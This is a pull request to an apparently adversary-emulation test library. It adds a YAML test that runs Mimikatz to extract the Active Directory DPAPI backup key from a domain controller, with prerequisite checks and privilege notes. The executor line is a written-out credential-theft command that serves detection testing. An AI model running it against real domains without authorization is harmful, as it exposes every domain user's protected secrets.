### PR TITLE
[T1552.004] Add DPAPI backup key theft with mimikatz

### DIFF
--- a/atomics/T1552.004/T1552.004.yaml
+++ b/atomics/T1552.004/T1552.004.yaml
@@ -197,3 +197,48 @@ atomic_tests:
       Remove-Item -Path ".\ADFS_encryption.pfx"
       Remove-Item -Path ".\ADFS_signing.pfx"
     name: powershell
+- name: DPAPI Backup Key theft
+  auto_generated_guid: bf67848f-f383-4bd9-9c03-9561aa938ed6
+  description: |
+    This module runs Mimikatz in order to retrieve the DPAPI Backup Key stored in Active Directory (https://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/).
+  supported_platforms:
+  - windows
+  input_arguments:
+    mimikatz_path:
+      description: Path of the Mimikatz binary
+      type: path
+      default: 'C:\Windows\Temp\mimikatz.exe'
+    target_dc:
+      description: Domain Controller to target
+      type: string
+      default: DC.DOMAIN.CORP
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Mimikatz binary must exist on disk and at the specified location (#{mimikatz_path}).
+      The computer must be domain-joined and the authenticated user must be part of the Domain Admins group (implicit authentication).
+    prereq_command: |
+      if (Test-Path "#{mimikatz_path}") {
+        Write-Host "OK: Mimikatz executable was found"
+      } else {
+        Write-Host "NOK: Mimikatz executable was not found"
+        exit 1
+      }
+
+      if ((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {
+        Write-Host "OK: the computer is joined to the domain"
+      } else {
+        Write-Host "NOK: the computer is not joined to the domain"
+        exit 1
+      }
+
+      # If everything goes well
+      exit 0
+    get_prereq_command: |
+      Write-Host "1. This computer must be manually joined to the targeted domain"
+      Write-Host "2. The binary of Mimikatz must be present on the system (https://github.com/gentilkiwi/mimikatz/releases)"
+  executor:
+    name: command_prompt
+    elevation_required: false
+    command: |
+      "#{mimikatz_path}" "lsadump::backupkeys /system:#{target_dc}" exit

--- a/atomics/T1552.004/T1552.004.yaml
+++ b/atomics/T1552.004/T1552.004.yaml
@@ -201,6 +201,7 @@ atomic_tests:
   auto_generated_guid: bf67848f-f383-4bd9-9c03-9561aa938ed6
   description: |
     This module runs Mimikatz in order to retrieve the DPAPI Backup Key stored in Active Directory (https://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/).
+    Computer must be domain-joined and running with a sufficiently privileged account (e.g. Domain Admins).
   supported_platforms:
   - windows
   input_arguments:
@@ -239,6 +240,6 @@ atomic_tests:
       Write-Host "2. The binary of Mimikatz must be present on the system (https://github.com/gentilkiwi/mimikatz/releases)"
   executor:
     name: command_prompt
-    elevation_required: false
+    elevation_required: false # not locally, but must be privileged in the domain (e.g. Domain Admins)
     command: |
       "#{mimikatz_path}" "lsadump::backupkeys /system:#{target_dc}" exit


### PR DESCRIPTION
**Details:**
Add the case of extracting the DPAPI backup keys with mimikatz (https://github.com/gentilkiwi/mimikatz). This is representing the case of accessing the LSA secrets of a DC remotely, to retrieve "G$BCKUPKEY_*" entries.

**Testing:**
Local testing
![art_dpapi](https://user-images.githubusercontent.com/42844128/156419295-1d95d32e-0e23-402d-96e5-e8fef7dd1665.png)

**Associated Issues:**
N.A.